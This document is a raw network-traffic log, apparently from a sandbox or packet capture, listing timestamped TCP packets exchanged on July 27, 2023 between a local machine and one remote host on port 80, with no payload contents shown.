Jul 27, 2023 20:18:59.612212896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612234116 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.612287998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612308979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612356901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.612401009 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612441063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.612648010 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612673044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612696886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612720966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612742901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.612759113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612768888 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.612818003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612840891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612884998 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.612901926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.612952948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.612988949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613010883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613029003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613075018 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.613117933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613154888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613168001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613220930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613234043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613308907 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.613781929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613801956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613815069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613827944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613841057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613859892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613882065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.613893986 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.613904953 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.631350040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.631431103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.631473064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.631513119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.631536961 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.631580114 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.631602049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.631653070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.631664991 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.631701946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.631741047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.631793022 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.634031057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634089947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634119987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634128094 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.634152889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634177923 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.634186983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634210110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634232998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634243965 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.634268045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634278059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.634299994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634322882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634344101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634356976 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.634377003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634387970 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.634409904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634850025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634874105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634898901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.634908915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634922028 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.634947062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634974003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.634998083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.635027885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.635042906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.635056019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.635540009 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.635567904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.635591030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.635617971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.635629892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.635641098 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.635660887 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.635683060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.635708094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.635723114 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.635804892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.636104107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636123896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636141062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636158943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636183023 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.636193037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636204958 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.636224031 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636241913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636260033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636280060 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.636305094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636315107 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.636339903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636359930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.636404991 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.654143095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.654174089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.654192924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.654211998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.654232025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.654254913 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.654275894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.654295921 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.656627893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656661034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656682014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656696081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656714916 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.656734943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656745911 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.656765938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656785011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656800032 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.656816006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656836033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.656848907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656868935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656888008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656908035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656918049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.656939983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656950951 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.656970024 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.656980038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.657000065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657080889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657126904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.657187939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657243013 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.657267094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657285929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657337904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.657812119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657836914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657855988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657869101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657905102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657929897 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.657942057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657963037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.657979965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658006907 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.658034086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.658561945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658588886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658652067 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.658683062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658830881 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658850908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658869982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658889055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658916950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658925056 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.658941984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.658961058 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.658967972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.658987999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.659008980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.659025908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.659044981 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.659058094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.659080029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.659089088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.659106970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.659126043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.659137964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.659157991 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.659198999 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.677789927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.677839994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.677877903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.677896976 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.677941084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.677977085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678004026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678039074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678054094 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678090096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678121090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678158045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678188086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678209066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678241968 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678258896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678292990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678328991 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678363085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678380966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678394079 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678430080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678467989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678498983 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678523064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678558111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678570986 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678606987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678646088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678680897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678699017 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678729057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678741932 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678770065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678798914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678828955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678855896 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678874969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678888083 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678915024 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678944111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.678957939 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.678986073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679027081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679054976 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679081917 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679099083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679115057 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679141045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679171085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679199934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679220915 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679250956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679260015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679287910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679316044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679344893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679361105 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679385900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679399967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679426908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679455042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679483891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679497957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679527998 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679539919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679569006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679596901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679625034 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679639101 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679673910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679682970 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679709911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679738998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679768085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679795027 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679811954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679826975 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679855108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679889917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679920912 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679939032 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.679964066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.679992914 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.680006981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.680038929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.680052996 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.680706978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.680737972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.680805922 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.680870056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.680903912 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.680958033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.681001902 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681040049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681075096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681092024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.681127071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681140900 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.681173086 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681204081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681233883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681262970 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.681284904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681293011 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.681322098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681350946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681379080 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.681394100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681425095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681437016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.681467056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681740999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681778908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681813955 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.681830883 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.681845903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681878090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681937933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681972980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.681982040 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.682020903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.682035923 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.682068110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.682092905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.682113886 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.682141066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.682180882 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.683012009 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683052063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683082104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683099985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683185101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683193922 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.683219910 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683245897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683269978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683298111 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.683310986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683336973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.683358908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683382988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683401108 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.683422089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683445930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683470011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683492899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.683511972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683532000 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.683552027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683576107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683599949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.683619976 CEST	49693	80	192.168.2.4	45.9.74.80
